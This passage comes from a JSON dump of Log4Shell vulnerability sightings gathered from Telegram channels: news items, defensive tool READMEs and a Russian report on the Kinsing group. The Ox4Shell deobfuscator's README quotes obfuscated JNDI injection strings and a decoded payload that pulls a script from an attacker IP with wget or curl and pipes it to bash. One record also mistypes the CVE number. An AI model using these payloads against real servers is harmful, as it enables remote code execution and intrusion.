brokers\n\nAs expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Log4j Java-based logging library. [...]\n\nhttps://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-by-state-backed-hackers-access-brokers/", "creation_timestamp": "2021-12-15T16:51:10.000000Z"}, {"uuid": "e613ad5e-53ec-446c-96ef-0a4645c37d31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4422", "type": "exploited", "source": "https://t.me/BleepingComputer/11313", "content": "Night Sky ransomware uses Log4j bug to hack VMware Horizon servers\n\nThe Night Sky ransomware gang has started to exploit the critical CVE-2021-4422 vulnerability in the Log4j logging library, also known as Log4Shell, to gain access to VMware Horizon systems. [...]\n\nhttps://www.bleepingcomputer.com/news/security/night-sky-ransomware-uses-log4j-bug-to-hack-vmware-horizon-servers/", "creation_timestamp": "2022-01-11T12:34:11.000000Z"}, {"uuid": "891606af-13b7-4987-bfdf-2b40fb548138", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BleepingComputer/19040", "content": "\u200aLazarus hackers drop new RAT malware using 2-year-old Log4j bug\n\nThe notorious North Korean hacking group known as Lazarus continues to exploit CVE-2021-44228, aka \"Log4Shell,\" this time to deploy three previously unseen malware families written in DLang. [...]\n\nhttps://www.bleepingcomputer.com/news/security/lazarus-hackers-drop-new-rat-malware-using-2-year-old-log4j-bug/", "creation_timestamp": "2023-12-12T01:34:25.000000Z"}, {"uuid": "02363d33-ecc6-48c3-8491-8bdda1a7d17b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BleepingComputer/19034", "content": "\u200aOver 30% of Log4J apps use a vulnerable version of the library\n\nRoughly 38% of applications using the Apache Log4j library are using a version vulnerable to security issues, including Log4Shell, a critical vulnerability identified as CVE-2021-44228 that carries the maximum severity rating, despite patches being available for more than two years. [...]\n\nhttps://www.bleepingcomputer.com/news/security/over-30-percent-of-log4j-apps-use-a-vulnerable-version-of-the-library/", "creation_timestamp": "2023-12-10T20:23:02.000000Z"}, {"uuid": "86f079ad-0db4-4533-a37a-12309687b6cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/1017", "content": "Deobfuscate Log4Shell payloads with ease.  Description  Since the release of the Log4Shell vulnerability (https://www.kitploit.com/search/label/Vulnerability) (CVE-2021-44228), many tools were created to obfuscate Log4Shell payloads,  making the lives of security engineers a nightmare.  This tool intends to unravel the true contents of obfuscated Log4Shell payloads.  For example, consider the following obfuscated payload:  ${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}\n  After running Ox4Shell, it would transform into an intuitive and readable form:  ${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}\n  This tool also aids to identify and decode (https://www.kitploit.com/search/label/Decode) base64 commands  For example, consider the following obfuscated payload:  ${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}\n  After running Ox4Shell, the tool reveals the attacker\u2019s intentions:  ${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash\n  We recommend running Ox4Shell with a provided file (-f) rather than an inline payload (https://www.kitploit.com/search/label/Payload) (-p), because certain  shell environments will escape important characters, therefore will yield inaccurate results.Usage  To run the tool simply:  ~/Ox4Shell \u00c2\u00bb python ox4shell.py --help\nusage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)\n\n   ____       _  _   _____ _          _ _ \n  / __ \\     | || | / ____| |        | | |\n | |  | |_  _| || || (___ | |__   ___| | |\n | |  | \\ \\/ /__   _\\___ \\| '_ \\ / _ \\ | |\n | |__| |&gt;  &lt;   | | ____) | | | |  __/ | |\n  \\____//_/\\_\\  |_||_____/|_| |_|\\___|_|_|\n\nOx4Shell - Deobfuscate (https://www.kitploit.com/search/label/Deobfuscate) Log4Shell payloads with ease.\n    Created by https://oxeye.io\n\nGeneral:\n  -h, --help            Show this help message and exit\n  -d, --debug           Enable debug mode (default: False)\n  -m MOCK, --mock MOCK  The location of the mock data JSON file that replaces certain values in the payload (default: mock.json)\n  --max-depth MAX_DEPTH\n                        The ma   ximum number of iteration to perform on a given payload (default: 150)\n  --decode-base64       Payloads containing base64 will be decoded (default: False)\n\nTargets:\n  Choose which target payloads to run Ox4Shell on\n\n  -p PAYLOAD, --payload PAYLOAD\n                        A single payload to deobfuscate, make sure to escape '$' signs (default: None)\n  -f FILE, --file FILE  A file containing payloads delimited by newline (default: None)\n  Mock Data  The Log4j library (https://www.kitploit.com/search/label/Library) has a few unique lookup functions, which allow users to look up environment variables, runtime  information on the Java process, and so forth. This capability grants threat actors the ability to probe for specific  information that can uniquely identify the compromised machine they targeted.  Ox4Shell uses the mock.json file to insert common values into certain lookup function, for example,  if the payload contains the value ${env:HOME}, we can replace it with a custom mock value.  The default set of mock data provided is:  {\n    \"hostname\": \"ip-127.0.0.1\",\n    \"env\": {\n        \"aws_profile\": \"staging\",\n        \"user\": \"ubuntu\",\n        \"pwd\": \"/opt/\",", "creation_timestamp": "2022-08-24T12:59:09.000000Z"}, {"uuid": "41f59038-1359-44fa-bcb7-015207c60b02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/zJ98GLgws4VlQB404Is5mew0dR50SIa0ympGxJEOETEOaLw", "content": "", "creation_timestamp": "2025-08-04T03:00:05.000000Z"}, {"uuid": "8d8eae4f-a5cb-4e9a-92c9-693b7adebce6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/2134", "content": "You can download PowerBI for free from https://aka.ms/pbiSingleInstaller and you don't need an Microsoft account to use it.  Configuration    Get an NIST API key: https://nvd.nist.gov/developers/request-an-api-key  cp env_example .env  edit the .env file and add your API key  optional: edit docker-compose file and adjust the cron schedule  optional: edit data/vulnerability-tables-logstash/config/logstash.conf  docker-compose up -d  you will find the files in data/vulnerability-tables-cron/output/ after the script completed. It needs several minutes.    Run  You can either wait for cron to execute the download script on a schedule.\n  Alternatively you can execute the download script manually by running:  docker exec -it vulnerability-tables-cron bash /opt/scripts/download.sh\n  Container Description  There are three docker containers.\n  The cron container downloads the information once a week (Monday 06:00) and stores the files in the output directory.\n  It uses curl and wget to download files. jq is used work with json.  The filebeat container reads the json files and forwards it to the logstash container.\n  The logstash container can be used to send to a OpenSearch instance, upload it to Azure Log Analytics, or other supported outputs.\n  Filebeat and logstash are optional and are only included for continence.  Example output files  Several output files will be generated. Here is an estimate:  316K   CISA_known_exploited.csv\n452K   CISA_known_exploited.json\n50M    CVSS.csv\n179M   CVSS.json\n206M   CVE.json\n56M    CVE.csv\n6.7M   EPSS.csv\n12M    EPSS.json\n49M    database.sqlite\n  You can expect this information for every CVE:  grep -i 'CVE-2021-44228' CVE.json | jq\n{\n  \"CVE\": \"CVE-2021-44228\",\n  \"CVSS2_accessComplexity\": \"AV:N/AC:M/Au:N/C:C/I:C/A:C\",\n  \"CVSS2_accessVector\": \"NETWORK\",\n  \"CVSS2_authentication\": \"MEDIUM\",\n  \"CVSS2_availabilityImpact\": \"NONE\",\n  \"CVSS2_baseScore\": \"COMPLETE\",\n  \"CVSS2_baseSeverity\": \"COMPLETE\",\n  \"CVSS2_confidentialityImpact\": \"COMPLETE\",\n  \"CVSS2_exploitabilityScore\": \"9.3\",\n  \"CVSS2_impactScore\": \"null\",\n  \"CVSS2_integrityImpact\": \"8.6\",\n  \"CVSS2_vectorString\": \"10\",\n  \"CVSS3_attackComplexity\": \"null\",\n  \"CVSS3_attackVector\": \"null\",\n  \"CVSS3_availabilityImpact\": \"null\",\n  \"CVSS3_baseScore\": \"null\",\n  \"CVSS3_baseSeverity\": \"null\",\n  \"CVSS3_confidentialityImpact\": \"null\",\n  \"CVSS3_exploitabilityScore\": \"null\",\n  \"CVSS3_impactScore\": \"null\",\n  \"CVSS3_integrityImpact\": \"null\",\n  \"CVSS3_privilegesRequired\": \"null\",\n  \"CVSS3_scope\": \"null\",\n  \"CVSS3_userInteraction   \": \"null\",\n  \"CVSS3_vectorString\": \"null\",\n  \"CVSS3_acInsufInfo\": \"null\",\n  \"CVSS3_obtainAllPrivilege\": \"null\",\n  \"CVSS3_obtainUserPrivilege\": \"null\",\n  \"CVSS3_obtainOtherPrivilege\": \"null\",\n  \"CVSS3_userInteractionRequired\": \"null\",\n  \"EPSS\": \"0.97095\",\n  \"EPSS_Percentile\": \"0.99998\",\n  \"CISA_dateAdded\": \"2021-12-10\",\n  \"CISA_RequiredAction\": \"For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.\"\n}\n  Links    https://www.first.org/epss/user-guide  https://www.cisa.gov/known-exploited-vulnerabilities-catalog  https://nvd.nist.gov/developers/vulnerabilities    \n\nDownload CVE-Vulnerability-Information-Downloader (https://github.com/trinitor/CVE-Vulnerability-Information-Downloader)", "creation_timestamp": "2023-02-25T16:17:24.000000Z"}, {"uuid": "1618229c-f04a-4141-8b2c-e1eaef914ff9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/369", "content": "A Developer and Security Engineer friendly package for Securing NodeJS (https://www.kitploit.com/search/label/NodeJS) Applications.  Inspired by the log4J vulnerability (https://www.kitploit.com/search/label/Vulnerability) (CVE-2021-44228 (https://nvd.nist.gov/vuln/detail/CVE-2021-44228)) which can be exploited because an application can make arbitrary network calls.  We felt there is an need for an application to declare what privileges it can have so that exploitation (https://www.kitploit.com/search/label/Exploitation) of such vulnerabilities (https://www.kitploit.com/search/label/vulnerabilities) becomes harder.  To achieve this, NSS (Node Security Shield) has Resource Access (https://www.kitploit.com/search/label/Access) Policy.\n  Resource Access Policy (RAP)  Resource Access Policy is similar to CSP(Content Security Policy (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)).  It lets the developer/security engineer declare what resources an application should access. And Node Security Shield will enforce it.  Installation  Install Node Security Shield using npm    npm install nodesecurityshield  Usage  // Require Node Security Shield\nlet nodeSecurityShield = require('nodesecurityshield');\n\n// Enable Attack Monitoring and/or Blocking\nnodeSecurityShield.enableAttackMonitoring(resourceAccessPolicy ,callbackFunction);  Sample resourceAccessPolicy  const resourceAccessPolicy  = {\n  \"outBoundRequest\" : {\n          \"blockedDomains\" : [\"*.123.com\", \"stats.abc.com\", 'xyz.com'],\n          \"allowedDomains\" : [\"*.domdog.io\"]\n      }\n};    Note: blockedDomains holds precedence over allowedDomains.  i.e., requests checked against blockedDomains first then allowedDomains.    Sample callbackFunction for Attack Monitoring  var callbackFunction = function (violationEvent) {\n  console.log(violationEvent);\n}  Sample callbackFunction for Attack Blocking  var callbackFunction = function (violationEvent) {\n    throw new Error(\"Request Blocked. It violates declared Resource Access Policy.\")\n}  Sample violationEvent  {\n \"violationtType\": \"Outbound Request\",\n \"message\": \"Outbound request to 'www.malicious.com' violates declared 'Resource Access Policy (RAP)'.\",\n \"policy\": {\n  \"outBoundRequest\" : {\n          \"blockedDomains\" : [\"*.123.com\", \"stats.abc.com\", 'xyz.com'],\n          \"allowedDomains\" : [\"*.domdog.io\"]\n      }\n}  Integrating with Sentry  Sample callbackFunction to integrate with Sentry (https://sentry.io/)  var callbackFunction = function (violationEvent) {\n  \n  var e = new Error();\n  e.name = 'Resource Access Policy Violation';\n  e.message = JSON.stringify(violationEvent);\n  Sentry.captureException(e);\n\n}  Screenshot from Sentry dashboard", "creation_timestamp": "2022-05-14T21:54:27.000000Z"}, {"uuid": "6b37cb2c-fef7-4ffd-b473-cd287e3ca671", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/true_secator/7335", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 F6 \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u043e\u043c \u043d\u0430\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0438 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u044b Kinsing (H2Miner \u0438\u00a0Resourceful Wolf) \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0437\u0430 \u0440\u0443\u0431\u0435\u0436\u043e\u043c \u0441 2019 \u0433\u043e\u0434\u0430, \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0441\u0432\u043e\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u043e\u0442\u00a0\u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f Kinsing, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043e\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0432\u00a0\u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u041e\u043d\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043d\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0434\u0436\u0435\u043a\u0438\u043d\u0433\u0435 - \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u0438 \u0432\u044b\u0447\u0438\u0441\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c\u0438 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u0434\u043b\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433\u0430 \u043a\u0440\u0438\u043f\u0442\u044b, \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e Monero (XMR), \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0438 \u0438 \u043f\u0440\u043e\u0434\u0432\u0438\u0436\u0435\u043d\u0438\u0438 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432.\n\n\u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0430\u0442\u0430\u043a \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435, \u0417\u0430\u043f\u0430\u0434\u043d\u043e\u0439 \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0410\u0437\u0438\u0438. \n\n\u0412 2024 \u0433\u043e\u0434\u0443 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u043e\u043e\u0431\u0449\u0430\u043b\u0438 \u043e\u0431 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0430\u0442\u0430\u043a Kinsing, \u043d\u0435 \u043e\u0431\u043e\u0437\u043d\u0430\u0447\u0430\u044f \u0446\u0435\u043b\u044c \u0430\u0442\u0430\u043a\u0438 \u0438 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0430 \u0432 2025 \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043f\u043e RU.\n\n\u0412\u0435\u0441\u043d\u043e\u0439 \u043e\u0434\u0438\u043d \u0438\u0437 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 F6 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b \u043f\u043e\u043f\u044b\u0442\u043a\u0443 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0441\u0432\u043e\u0438 \u0432\u043d\u0435\u0448\u043d\u0438\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430.\n\n\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430 IoCs, \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u0442\u0440\u0430\u0444\u0438\u043a\u0430 \u0438 \u0441\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u044b\u044f\u0432\u043b\u044f\u0435\u043c\u044b\u0445 TTPs \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0432\u044b\u0448\u043b\u0438 \u043d\u0430 \u0441\u043b\u0435\u0434 Kinsing.\n\n\u0413\u043b\u0430\u0432\u043d\u0430\u044f \u0446\u0435\u043b\u044c Kinsing - \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e \u0434\u043b\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442.\n\n\u0412 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442\u00a0\u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0430 \u0434\u0440\u0443\u0433\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a,\u00a0Kinsing\u00a0\u043d\u0435 \u043f\u0440\u0438\u0431\u0435\u0433\u0430\u0435\u0442 \u043a\u00a0\u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u043c \u0430\u0442\u0430\u043a\u0430\u043c, \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u044e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u0432\u044b\u044f\u0432\u043b\u044f\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0442 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0447\u0430\u0441\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: CVE-2017-9841, CVE-2019-17564, CVE-2019-19781, CVE-2020-10684, CVE-2020-17519, CVE-2020-5902, CVE-2020-9480, CVE-2021-26084, CVE-2021-41773, CVE-2021-44228, CVE-2022-24706, CVE-2022-26134, CVE-2023-35042.\n\n\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432\u044b \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0449\u0435\u0442 \u043c\u0430\u0439\u043d\u0435\u0440\u044b \u043a\u043e\u043d\u043a\u0443\u0440\u0435\u043d\u0442\u043e\u0432, \u0443\u0434\u0430\u043b\u044f\u0435\u0442 \u0438\u0445 \u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439.\n\n\u0410\u0442\u0430\u043a\u0438 Kinsing \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430\u00a0\u0441\u0435\u0440\u0432\u0435\u0440\u043d\u044b\u0435 Linux-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0432\u00a0\u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0438\u00a0\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043d\u044b\u0445 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430\u0445\n\n\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u00a0\u043e\u0448\u0438\u0431\u043a\u0438 \u0432\u00a0\u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0435 \u0432\u00a0\u0442\u0430\u043a\u0438\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430\u0445, \u043a\u0430\u043a Docker, Kubernetes, Redis \u0438\u00a0PostgreSQL, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u0432\u00a0\u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445 - Apache Log4j, Tomcat, NiFi, Confluence, Citrix, WebLogic \u0438\u00a0\u0434\u0440\u0443\u0433\u0438\u0445.\n\n\u0414\u043b\u044f \u043a\u0430\u0436\u0434\u043e\u0439 \u0446\u0435\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u043a\u0440\u0438\u043f\u0442\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440,\u00a0lh.sh\u00a0\u0434\u043b\u044f\u00a0Log4Shell), \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u044e\u0449\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043c\u0430\u0439\u043d\u0435\u0440\u044b \u0438\u00a0\u0441\u0430\u043c \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a Kinsing.\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f - \u0437\u0430\u043c\u0435\u0434\u043b\u0435\u043d\u0438\u0435 \u0440\u0430\u0431\u043e\u0442\u044b, \u0441\u043d\u0438\u0436\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0438 \u0443\u0441\u043a\u043e\u0440\u0435\u043d\u043d\u044b\u0439 \u0438\u0437\u043d\u043e\u0441 \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u044f.\n\n\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f (\u043e\u0442\u00a0\u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u00a0\u043f\u0440\u0438\u043c\u0435\u043d\u0451\u043d\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0434\u043e \u0438\u0442\u043e\u0433\u043e\u0432\u043e\u0439 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u0438 \u0430\u0442\u0430\u043a\u0438 \u0438\u00a0\u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439) \u0438 IOCs - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2025-08-15T16:40:05.000000Z"}, {"uuid": "25243936-b4e1-4392-a239-2b08080a8b90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/poxek/1295", "content": "LogMePwn\n\u041f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439, \u043c\u043d\u043e\u0433\u043e\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u044c\u043d\u044b\u0439, \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439, 